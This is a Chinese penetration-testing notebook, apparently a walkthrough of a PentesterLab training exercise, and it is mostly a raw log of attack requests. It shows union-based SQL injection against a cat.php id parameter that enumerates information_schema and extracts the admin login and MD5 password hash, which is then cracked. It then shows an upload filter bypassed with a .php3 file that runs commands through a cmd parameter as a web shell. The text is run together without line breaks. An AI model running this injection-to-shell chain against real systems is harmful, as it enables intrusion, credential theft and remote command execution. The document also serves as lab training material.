from mysql to shell渗透测试笔记.doc

28/28/cat.php?id=1%27You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near at line 1telnet 28 8028/cat.php?id=2%20order%20by%203#显示正常28/cat.php?id=2%20order%20by%204#显示正常28/cat.php?id=2%20order%20by%205#Unknown column 5 in order clause28/cat.php?id=2%20union%20select%201,2,3,4显示所有页面28/cat.php?id=2%20union%20select%201,2,3,4,5The used SELECT statements have a different number of columns28/cat.php?id=2%20union%20select%20user(),database(),version(),4显示所有页面，但是没有user()等信息28/cat.php?id=1%20union%20select%20user(),database(),version,current_user()显示所有页面，但是没有user()等信息28/cat.php?id=1%20union%20select%201,user(),3,4显示picture: pentesterlablocalhost28/cat.php?id=1%20union%20select%201,database(),3,4picture: photoblog28/cat.php?id=1%20union%20select%201,version(),3,4picture: 5.1.63-0+squeeze128/cat.php?id=1%20union%20select%201,current_user(),3,4picture: pentesterlablocalhost28/cat.php?id=1%20union%20select%201,tablename,3,4%20from%20information_schema.tablesUnknown column tablename in field list28/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tablespicture: character_setsCHARACTER_SETSpicture: collationsCOLLATIONSpicture: collation_character_set_applicabilityCOLLATION_CHARACTER_SET_APPLICABILITYpicture: columnsCOLUMNSpicture: column_privilegesCOLUMN_PRIVILEGESpicture: enginesENGINESpicture: eventsEVENTSpicture: filesFILESpicture: global_statusGLOBAL_STATUSpicture: global_variablesGLOBAL_VARIABLESpicture: key_column_usageKEY_COLUMN_USAGEpicture: partitionsPARTITIONSpicture: pluginsPLUGINSpicture: processlistPROCESSLISTpicture: profilingPROFILINGpicture: referential_constraintsREFERENTIAL_CONSTRAINTSpicture: routinesROUTINESpicture: schemataSCHEMATApicture: schema_privilegesSCHEMA_PRIVILEGESpicture: session_statusSESSION_STATUSpicture: session_variablesSESSION_VARIABLESpicture: statisticsSTATISTICSpicture: tablesTABLESpicture: table_constraintsTABLE_CONSTRAINTSpicture: table_privilegesTABLE_PRIVILEGESpicture: triggersTRIGGERSpicture: user_privilegesUSER_PRIVILEGESpicture: viewsVIEWSpicture: categoriescategoriespicture: picturespicturespicture: usersusers28/cat.php?id=1%20union%20select%201,column_name,3,4%20from%20information_schema.columnspicture: character_set_nameCHARACTER_SET_NAMEpicture: default_collate_nameDEFAULT_COLLATE_NAMEpicture: descriptionDESCRIPTIONpicture: maxlenMAXLENpicture: collation_nameCOLLATION_NAMEpicture: idIDpicture: is_defaultIS_DEFAULTpicture: is_compiledIS_COMPILEDpicture: sortlenSORTLENpicture: table_catalogTABLE_CATALOGpicture: table_schemaTABLE_SCHEMApicture: table_nameTABLE_NAMEpicture: column_nameCOLUMN_NAMEpicture: ordinal_positionORDINAL_POSITIONpicture: column_defaultCOLUMN_DEFAULTpicture: is_nullableIS_NULLABLEpicture: data_typeDATA_TYPEpicture: character_maximum_lengthCHARACTER_MAXIMUM_LENGTHpicture: character_octet_lengthCHARACTER_OCTET_LENGTHpicture: numeric_precisionNUMERIC_PRECISIONpicture: numeric_scaleNUMERIC_SCALEpicture: column_typeCOLUMN_TYPEpicture: column_keyCOLUMN_KEYpicture: extraEXTRApicture: privilegesPRIVILEGESpicture: column_commentCOLUMN_COMMENTpicture: granteeGRANTEEpicture: privilege_typePRIVILEGE_TYPEpicture: is_grantableIS_GRANTABLEpicture: engineENGINEpicture: supportSUPPORTpicture: commentCOMMENTpicture: transactionsTRANSACTIONSpicture: xaXApicture: savepointsSAVEPOINTSpicture: event_catalogEVENT_CATALOGpicture: event_schemaEVENT_SCHEMApicture: event_nameEVENT_NAMEpicture: definerDEFINERpicture: time_zoneTIME_ZONEpicture: event_bodyEVENT_BODYpicture: event_definitionEVENT_DEFINITIONpicture: event_typeEVENT_TYPEpicture: execute_atEXECUTE_ATpicture: interval_valueINTERVAL_VALUEpicture: interval_fieldINTERVAL_FIELDpicture: sql_modeSQL_MODEpicture: startsSTARTSpicture: endsENDSpicture: statusSTATUSpicture: on_completionON_COMPLETIONpicture: createdCREATEDpicture: last_alteredLAST_ALTEREDpicture: last_executedLAST_EXECUTEDpicture: event_commentEVENT_COMMENTpicture: originatorORIGINATORpicture: character_set_clientCHARACTER_SET_CLIENTpicture: collation_connectionCOLLATION_CONNECTIONpicture: database_collationDATABASE_COLLATIONpicture: file_idFILE_IDpicture: file_nameFILE_NAMEpicture: file_typeFILE_TYPEpicture: tablespace_nameTABLESPACE_NAMEpicture: logfile_group_nameLOGFILE_GROUP_NAMEpicture: logfile_group_numberLOGFILE_GROUP_NUMBERpicture: fulltext_keysFULLTEXT_KEYSpicture: deleted_rowsDELETED_ROWSpicture: update_countUPDATE_COUNTpicture: free_extentsFREE_EXTENTSpicture: total_extentsTOTAL_EXTENTSpicture: extent_sizeEXTENT_SIZEpicture: initial_sizeINITIAL_SIZEpicture: maximum_sizeMAXIMUM_SIZEpicture: autoextend_sizeAUTOEXTEND_SIZEpicture: creation_timeCREATION_TIMEpicture: last_update_timeLAST_UPDATE_TIMEpicture: last_access_timeLAST_ACCESS_TIMEpicture: recover_timeRECOVER_TIMEpicture: transaction_counterTRANSACTION_COUNTERpicture: versionVERSIONpicture: row_formatROW_FORMATpicture: table_rowsTABLE_ROWSpicture: avg_row_lengthAVG_ROW_LENGTHpicture: data_lengthDATA_LENGTHpicture: max_data_lengthMAX_DATA_LENGTHpicture: index_lengthINDEX_LENGTHpicture: data_freeDATA_FREEpicture: create_timeCREATE_TIMEpicture: update_timeUPDATE_TIMEpicture: check_timeCHECK_TIMEpicture: checksumCHECKSUMpicture: variable_nameVARIABLE_NAMEpicture: variable_valueVARIABLE_VALUEpicture: constraint_catalogCONSTRAINT_CATALOGpicture: constraint_schemaCONSTRAINT_SCHEMApicture: constraint_nameCONSTRAINT_NAMEpicture: position_in_unique_constraintPOSITION_IN_UNIQUE_CONSTRAINTpicture: referenced_table_schemaREFERENCED_TABLE_SCHEMApicture: referenced_table_nameREFERENCED_TABLE_NAMEpicture: referenced_column_nameREFERENCED_COLUMN_NAMEpicture: partition_namePARTITION_NAMEpicture: subpartition_nameSUBPARTITION_NAMEpicture: partition_ordinal_positionPARTITION_ORDINAL_POSITIONpicture: subpartition_ordinal_positionSUBPARTITION_ORDINAL_POSITIONpicture: partition_methodPARTITION_METHODpicture: subpartition_methodSUBPARTITION_METHODpicture: partition_expressionPARTITION_EXPRESSIONpicture: subpartition_expressionSUBPARTITION_EXPRESSIONpicture: partition_descriptionPARTITION_DESCRIPTIONpicture: partition_commentPARTITION_COMMENTpicture: nodegroupNODEGROUPpicture: plugin_namePLUGIN_NAMEpicture: plugin_versionPLUGIN_VERSIONpicture: plugin_statusPLUGIN_STATUSpicture: plugin_typePLUGIN_TYPEpicture: plugin_type_versionPLUGIN_TYPE_VERSIONpicture: plugin_libraryPLUGIN_LIBRARYpicture: plugin_library_versionPLUGIN_LIBRARY_VERSIONpicture: plugin_authorPLUGIN_AUTHORpicture: plugin_descriptionPLUGIN_DESCRIPTIONpicture: plugin_licensePLUGIN_LICENSEpicture: userUSERpicture: hostHOSTpicture: dbDBpicture: commandCOMMANDpicture: timeTIMEpicture: stateSTATEpicture: infoINFOpicture: query_idQUERY_IDpicture: seqSEQpicture: durationDURATIONpicture: cpu_userCPU_USERpicture: cpu_systemCPU_SYSTEMpicture: context_voluntaryCONTEXT_VOLUNTARYpicture: context_involuntaryCONTEXT_INVOLUNTARYpicture: block_ops_inBLOCK_OPS_INpicture: block_ops_outBLOCK_OPS_OUTpicture: messages_sentMESSAGES_SENTpicture: messages_receivedMESSAGES_RECEIVEDpicture: page_faults_majorPAGE_FAULTS_MAJORpicture: page_faults_minorPAGE_FAULTS_MINORpicture: swapsSWAPSpicture: source_functionSOURCE_FUNCTIONpicture: source_fileSOURCE_FILEpicture: source_lineSOURCE_LINEpicture: unique_constraint_catalogUNIQUE_CONSTRAINT_CATALOGpicture: unique_constraint_schemaUNIQUE_CONSTRAINT_SCHEMApicture: unique_constraint_nameUNIQUE_CONSTRAINT_NAMEpicture: match_optionMATCH_OPTIONpicture: update_ruleUPDATE_RULEpicture: delete_ruleDELETE_RULEpicture: specific_nameSPECIFIC_NAMEpicture: routine_catalogROUTINE_CATALOGpicture: routine_schemaROUTINE_SCHEMApicture: routine_nameROUTINE_NAMEpicture: routine_typeROUTINE_TYPEpicture: dtd_identifierDTD_IDENTIFIERpicture: routine_bodyROUTINE_BODYpicture: routine_definitionROUTINE_DEFINITIONpicture: external_nameEXTERNAL_NAMEpicture: external_languageEXTERNAL_LANGUAGEpicture: parameter_stylePARAMETER_STYLEpicture: is_deterministicIS_DETERMINISTICpicture: sql_data_accessSQL_DATA_ACCESSpicture: sql_pathSQL_PATHpicture: security_typeSECURITY_TYPEpicture: routine_commentROUTINE_COMMENTpicture: catalog_nameCATALOG_NAMEpicture: schema_nameSCHEMA_NAMEpicture: default_character_set_nameDEFAULT_CHARACTER_SET_NAMEpicture: default_collation_nameDEFAULT_COLLATION_NAMEpicture: non_uniqueNON_UNIQUEpicture: index_schemaINDEX_SCHEMApicture: index_nameINDEX_NAMEpicture: seq_in_indexSEQ_IN_INDEXpicture: collationCOLLATIONpicture: cardinalityCARDINALITYpicture: sub_partSUB_PARTpicture: packedPACKEDpicture: nullableNULLABLEpicture: index_typeINDEX_TYPEpicture: table_typeTABLE_TYPEpicture: auto_incrementAUTO_INCREMENTpicture: table_collationTABLE_COLLATIONpicture: create_optionsCREATE_OPTIONSpicture: table_commentTABLE_COMMENTpicture: constraint_typeCONSTRAINT_TYPEpicture: trigger_catalogTRIGGER_CATALOGpicture: trigger_schemaTRIGGER_SCHEMApicture: trigger_nameTRIGGER_NAMEpicture: event_manipulationEVENT_MANIPULATIONpicture: event_object_catalogEVENT_OBJECT_CATALOGpicture: event_object_schemaEVENT_OBJECT_SCHEMApicture: event_object_tableEVENT_OBJECT_TABLEpicture: action_orderACTION_ORDERpicture: action_conditionACTION_CONDITIONpicture: action_statementACTION_STATEMENTpicture: action_orientationACTION_ORIENTATIONpicture: action_timingACTION_TIMINGpicture: action_reference_old_tableACTION_REFERENCE_OLD_TABLEpicture: action_reference_new_tableACTION_REFERENCE_NEW_TABLEpicture: action_reference_old_rowACTION_REFERENCE_OLD_ROWpicture: action_reference_new_rowACTION_REFERENCE_NEW_ROWpicture: view_definitionVIEW_DEFINITIONpicture: check_optionCHECK_OPTIONpicture: is_updatableIS_UPDATABLEpicture: titletitlepicture: imgimgpicture: catcatpicture: loginloginpicture: password28/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.columns返回一堆信息28/cat.php?id=1%20union%20select%201,table_name,column_name,4%20from%20information_schema.columns返回一堆信息把concat(table_name,%27:%27,column_name)评在一起28/cat.php?id=1%20union%20select%201,concat(table_name,%27:%27,column_name),3,4%20from%20information_schema.columns返回一堆table_name和column_name信息picture: users:idusers:idpicture: users:loginusers:loginpicture: users:password28/cat.php?id=1%20union%20select%201,concat(login,%27:%27,password),3,4%20from%20userspicture: admin:8efe310f9ab3efeae8d410a8e0166eb228/cat.php?id=1%20union%20select%201,concat(id,%27:%27,login,%27:%27,password),3,4%20from%20userspicture: 1:admin:8efe310f9ab3efeae8d410a8e0166eb2在http:/www.hashkiller.co.uk/md5-decrypter.aspx查询到8efe310f9ab3efeae8d410a8e0166eb2 MD5 :P4ssw0rd登陆后台，上传test1.php3INSERT INTO pictures (title, img, cat) VALUES (,test1.php3,1上传test2.php.aaaINSERT INTO pictures (title, img, cat) VALUES (test,test2.php.aaa,1)页面审查元素发现，图片路径是admin/uploads28/admin/uploads/test1.php3?cmd=lscthulhu.png hacker.png ruby.jpg test1.php3 test2.php.aaa28